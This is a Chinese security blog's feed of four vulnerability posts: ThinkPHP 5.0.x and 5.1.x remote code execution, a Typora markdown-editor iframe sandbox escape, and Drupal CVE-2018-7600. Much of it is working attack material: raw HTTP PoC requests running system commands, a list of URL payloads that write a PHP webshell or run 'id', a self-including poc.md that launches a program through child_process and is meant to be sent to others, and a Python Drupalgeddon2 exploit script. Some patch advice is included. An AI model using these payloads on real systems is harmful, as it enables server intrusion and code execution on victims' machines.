远程命令执行 – ChaBug安全 / 一个分享知识、结识伙伴、资源共享的博客 Fri, 23 Aug 2019 01:19:28 +0000 zh-CN hourly 1 https://wordpress.org/?v=5.5.5 Thinkphp5.x又双叒叕一个远程代码执行 /web/638.html Fri, 11 Jan 2019 12:44:24 +0000 /?p=638 今天thinkphp官方又双叒叕发布了5.0.24版本,包含了一个可能getshell的安全更新。在12月9日thinkphp爆出远程代码执行之后,今天晚上又爆出来远程代码执行,见官方公告

影响范围

thinkphp5.0.0~5.0.23

各版本PoC

thinkphp5.0.10版本poc如图

POST /think-5.0.10/public/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
​
s=whoami&_method=__construct&method=&filter[]=system

 

在官网最新下载的5.0.23完整版中,在App类(thinkphp/library/think/App.php)中module方法增加了设置filter参数值的代码,用于初始化filter。因此通过上述请求设置的filter参数值会被重新覆盖为空导致无法利用。

thinkphp5.0.23版本需要开启debug模式才可以利用,附两个poc: 

POST /thinkphp/public/index.php HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
​
_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami

 

POST /thinkphp/public/index.php?s=captcha HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
​
_method=__construct&filter[]=system&method=post&server[REQUEST_METHOD]=whoami

 

上一个rec参考链接

thinkphp5框架缺陷导致远程代码执行

https://y4er.com/post/thinkphp5.x-rce-18-12-9/

]]> Typora Remote Command Execution /web/627.html Thu, 20 Dec 2018 02:59:49 +0000 /?p=627 前言

Typora是一个颜值和实力并存的markdown编辑器,我也在用。Typora基于Electron框架进行开发,今天看到了就复现下这个漏洞。

漏洞分析

在基于Electron框架开发的应用中,如果说找到了XSS漏洞,那么基本上也完成了命令执行。那么我们进行XSS盲打之后并没有收获,原因是因为Typora的作者在开发的过程中用到了https://github.com/cure53/DOMPurify,缓解了大部分的XSS攻击。

然鹅,iframe是一个神奇的标签,我们先来尝试下

<iframe src="javascript:alert(1)"></iframe>

我们来看下输出的结果

可以看到,typora把iframe这个标签的src属性会当作相对路径进行处理,那么我们来包含下本地文件试试

新建poc.md输入

<iframe src="./poc.html"></iframe>

同目录下的poc.html内容如下:

<script>
        window.parent.top.alert(1)
</script>

弹窗!

那么为什么弹窗呢?打开Devtools看下

Typora将我们的iframe标签解析成如下代码,其中sendbox是我们要注意的

<iframe src="C:\Users\Y4er\Desktop\poc.html" allow-top-navigation="false" allow-forms="false" allowfullscreen="true" allow-popups="false" sandbox="allow-same-origin allow-scripts" onload="window.remoteOnLoad(this)" height="0" data-user-height="0"></iframe>

我们看下HTML的文档中关于sendbox的说明,在html5中通过sendbox来提高iframe的安全性,而文档中也提到了

如果allow-scriptsallow-same-origin同时被设置为sendbox的属性时,那么sendbox则形同虚设

那么我们修改下我们的poc来进行命令执行

<script>
      //rce
        window.parent.top.require('child_process').execFile('C:/Windows/System32/calc.exe',function(error, stdout, stderr){
        if(error){
            console.log(error);
        }  
        });
</script>

我们捋一下思路,现在我们通过iframe的src属性引用同目录的poc.html文档,来执行命令。可是这就需要两个文件,一个poc.md,一个poc.html。繁琐,有没有办法做到一个文件就达到我们的命令执行的目的的?

尝试srcdoc

<iframe srcdoc="<script>window.parent.top.alert(1)</script>"></iframe>

并没有效果,在Devtools中我们看到sendbox的属性被设置为空,那么这是默认应用所有的沙盒限制,srcdoc不可行

尝试引入md文件

poc.md

<iframe src="./poc.md"></iframe>

cmd.md

<script>
      //rce
        window.parent.top.require('child_process').execFile('C:/Windows/System32/calc.exe',function(error, stdout, stderr){
        if(error){
            console.log(error);
        }  
        });
</script>

计算器被弹了出来

也就是说我们现在能够引入md文件,这样的话我们代码执行的命令就可以直接放到poc.md中,然后自己iframe自己就可以达到命令执行的效果了。

引用自己

构造poc.md

<iframe src="./poc.md"></iframe>
<script>
      //rce
        window.parent.top.require('child_process').execFile('C:/Windows/System32/calc.exe',function(error, stdout, stderr){
        if(error){
            console.log(error);
        }  
        });
</script>

现在我们把poc.md文件发给别人,只要他用typora打开,就会执行我们代码中的命令。

后记

这篇文章是我昨天晚上看到的,今天复现的时候发现点问题,列举下:

  1. 平台限制 基于Electron框架开发只是在win上,mac和Linux就另当别论

  2. 版本限制 我用0.9.60beta版本不能执行,看了Typora的版本日志后发现在0.9.9.56 (beta)版本中才支持video, iframe, kbd, details, ruby这类标签,漏洞也产生在这个版本,而在0.9.9.57 (beta)版本中就对此漏洞进行了修复,限制太大

参考原文链接:https://zhuanlan.zhihu.com/p/51768716

]]> thinkphp5框架缺陷导致远程代码执行 /web/613.html Tue, 11 Dec 2018 11:45:30 +0000 /?p=613

 

/tp-5.1.24/public/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

1、?s=index/\think\Request/input&filter=phpinfo&data=1
2、?s=index/\think\Request/input&filter=system&data=id
3、?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
4、?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
5、?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
6、?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
8、?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

]]> CVE-2018-7600 Drupal 远程命令执行漏洞EXP /web/399.html Sat, 14 Apr 2018 15:19:00 +0000 /?p=328 CVE-2018-7600

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code .

影响版本

  1. Drupal 6
  2. Drupal 7
  3. Drupal 8

修复建议

Drupal 6.x的修复参考以下网站:

https://www.drupal.org/project/d6lts

Drupal 7.x请升级到Drupal 7.5.8版本,

同时官方给出7.X补丁,若用户无法立即升级版本,请更新补丁,补丁地址为:

https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5

Drupal 8.5.x请升级到Drupal 8.5.1版本

同时官方给出8.5.X补丁,若用户无法立即升级版本,请更新补丁,补丁地址为:

https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f

Drupal 8.3.x和8.4.x版本官方已不进行维护,但此漏洞非常严重,官方此次也给出了对应补丁,补丁同8.5.x版本:补丁地址为:

https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f

由于Drupal 8.3.x和8.4.x版本官方已不进行维护,建议用户最好升级到官方维护的Drupal 8.3.9以及Drupal 8.4.6版本

友情提示

Drupal 8.0.x、Drupal 8.1.x、Drupal 8.2.x官方已不再维护,请各位用户升级到官方维护的版本

EXP

#!/usr/bin/env
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
target = input('Enter target url (example: https://domain.ltd/): ')
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}
r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')
]]>